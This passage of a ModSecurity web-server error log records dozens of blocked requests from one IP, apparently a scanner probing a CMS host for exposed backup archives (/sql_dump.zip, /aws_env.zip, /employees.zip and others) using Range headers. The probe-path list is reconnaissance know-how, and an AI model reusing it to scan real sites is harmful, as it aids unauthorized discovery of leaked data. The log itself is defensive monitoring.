"WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/control_panel.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD31AAAABg"] [Sun Mar 08 19:04:39.716076 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:60384] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_env.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD31QAAAAg"] [Sun Mar 08 19:04:39.718152 2026] [:error] [pid 13472:tid 13510] [client 35.189.151.148:42788] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-5.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8twAAAEc"] [Sun Mar 08 19:04:39.722448 2026] [:error] [pid 13471:tid 13486] [client 35.189.151.148:38764] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_export.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD31gAAAAs"] [Sun Mar 08 19:04:39.722450 2026] [:error] [pid 13472:tid 13502] [client 35.189.151.148:43228] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/technical_docs.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8uAAAAEA"] [Sun Mar 08 19:04:39.722460 2026] [:error] [pid 29564:tid 29571] [client 35.189.151.148:44684] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_7.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYRgAAAQA"] [Sun Mar 08 19:04:39.722486 2026] [:error] [pid 13473:tid 13524] [client 35.189.151.148:39766] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/restore.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6DQAAAIU"] [Sun Mar 08 19:04:39.722835 2026] [:error] [pid 27307:tid 27311] [client 35.189.151.148:38268] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_lambda.zip"] [unique_id "aa2sJwo1nI2o7tYBWw9SYgAAAUI"] [Sun Mar 08 19:04:39.724760 2026] [:error] [pid 11078:tid 11123] [client 35.189.151.148:42456] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_serverless.zip"] [unique_id "aa2sJ3-dmvIeGeY060kijwAAAc0"] [Sun Mar 08 19:04:39.724789 2026] [:error] [pid 13605:tid 13615] [client 35.189.151.148:37884] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/apis.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfkQAAAMg"] [Sun Mar 08 19:04:39.724815 2026] [:error] [pid 13605:tid 13629] [client 35.189.151.148:37152] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_01012024.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfkgAAANY"] [Sun Mar 08 19:04:39.724920 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:37266] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/before-update.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD31wAAAAM"] [Sun Mar 08 19:04:39.724998 2026] [:error] [pid 29564:tid 29591] [client 35.189.151.148:39392] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/cron.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYRwAAARM"] [Sun Mar 08 19:04:39.725042 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:43032] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/preproduction.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD32AAAABE"] [Sun Mar 08 19:04:39.725196 2026] [:error] [pid 27307:tid 27320] [client 35.189.151.148:40558] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/employees.zip"] [unique_id "aa2sJwo1nI2o7tYBWw9SYwAAAUs"] [Sun Mar 08 19:04:39.725220 2026] [:error] [pid 29564:tid 29576] [client 35.189.151.148:43614] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-07.zip"] [unique_id "aa2sJwemqWLB0zKFm0TYSAAAAQQ"] [Sun Mar 08 19:04:39.727119 2026] [:error] [pid 12902:tid 12947] [client 35.189.151.148:41114] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sql_dump.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAlQAAAow"] [Sun Mar 08 19:04:39.727154 2026] [:error] [pid 12902:tid 12951] [client 35.189.151.148:38224] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/release-backup.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAlgAAApA"] [Sun Mar 08 19:04:39.727155 2026] [:error] [pid 11078:tid 11124] [client 35.189.151.148:40614] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_metrics.zip"] [unique_id "aa2sJ3-dmvIeGeY060kikAAAAc4"] [Sun Mar 08 19:04:39.727171 2026] [:error] [pid 12819:tid 12868] [client 35.189.151.148:41980] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_ami.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-24AAAAlc"] [Sun Mar 08 19:04:39.727259 2026] [:error] [pid 7010:tid 7039] [client 35.189.151.148:39784] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/s3.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-ZgAAAYI"] [Sun Mar 08 19:04:39.727261 2026] [:error] [pid 12819:tid 12857] [client 35.189.151.148:44442] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-serverless.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-24QAAAk0"] [Sun Mar 08 19:04:39.727284 2026] [:error] [pid 7010:tid 7055] [client 35.189.151.148:42632] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_reports.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-ZQAAAZI"] [Sun Mar 08 19:04:39.727536 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:38288] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/files.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD32QAAABQ"] [Sun Mar 08 19:04:39.727541 2026] [:error] [pid 7010:tid 7048] [client 35.189.151.148:40722] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/system_backup.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-ZwAAAYs"] [Sun Mar 08 19:04:39.727555 2026] [:error] [pid 13471:tid 13475] [client 35.189.151.148:37408] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/encrypted.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD32gAAAAA"] [Sun Mar 08 19:04:39.727613 2026] [:error] [pid 12819:tid 12845] [client 35.189.151.148:40082] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/transfer.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-24gAAAkE"] [Sun Mar 08 19:04:39.729630 2026] [:error] [pid 13472:tid 13516] [client 35.189.151.148:39040] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/html.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8uQAAAEs"] [Sun Mar 08 19:04:39.729632 2026] [:error] [pid 13605:tid 13628] [client 35.189.151.148:43982] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/sample.zip"] [unique_id "aa2sJzLobmDOvyRcAEhfkwAAANU"] [Sun Mar 08 19:04:39.729640 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:37434] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/shop.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD32wAAAAc"] [Sun Mar 08 19:04:39.729743 2026] [:error] [pid 12902:tid 12936] [client 35.189.151.148:39314] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/new.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAlwAAAoE"] [Sun Mar 08 19:04:39.732054 2026] [:error] [pid 7010:tid 7051] [client 35.189.151.148:43264] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/adminer.zip"] [unique_id "aa2sJ5q2Bzew8vjPgCG-aAAAAY4"] [Sun Mar 08 19:04:39.732059 2026] [:error] [pid 13605:tid 13630] [client 35.189.151.148:37632] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/finance.zip"] [unique_id "aa2sJzLobmDOvyRcAEhflAAAANc"] [Sun Mar 08 19:04:39.732082 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:43042] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/tasks.zip"] [unique_id "aa2sJ13UyizU6P-l0YL8ugAAAEg"] [Sun Mar 08 19:04:39.732130 2026] [:error] [pid 13473:tid 13550] [client 35.189.151.148:41870] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/snapshot.zip"] [unique_id "aa2sJ0wwZGElJGd8aN_6DgAAAJU"] [Sun Mar 08 19:04:39.732137 2026] [:error] [pid 12902:tid 12941] [client 35.189.151.148:37226] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/test_build.zip"] [unique_id "aa2sJ2aTUOdovAC89_RAmAAAAoY"] [Sun Mar 08 19:04:39.732166 2026] [:error] [pid 13605:tid 13624] [client 35.189.151.148:37844] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/ssl.zip"] [unique_id "aa2sJzLobmDOvyRcAEhflQAAANE"] [Sun Mar 08 19:04:39.732498 2026] [:error] [pid 12819:tid 12846] [client 35.189.151.148:38386] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-03.zip"] [unique_id "aa2sJ_NtUJnAKTO-2_-24wAAAkI"] [Sun Mar 08 19:04:39.733315 2026] [:error] [pid 13605:tid 13631] [client 35.189.151.148:60856] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/server_settings.zip"] [unique_id "aa2sJzLobmDOvyRcAEhflgAAANg"] [Sun Mar 08 19:04:39.734499 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:38214] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.bak.zip"] [unique_id "aa2sJ78gLDtA4xTIJqD33AAAABY"] [Sun Mar 08 19:04:39.734526 2026] [:error] [pid 11078:tid 11118] [client 35.189.151.148:37446] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup-09.zip"] [unique_id "aa2sJ3-dmvIeGeY060kikQAAAcg"] [Sun Mar 08 19:04:39.734588 2026] [:error] [pid 13605:tid 13611] [client 35.189.151.148:43964] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] 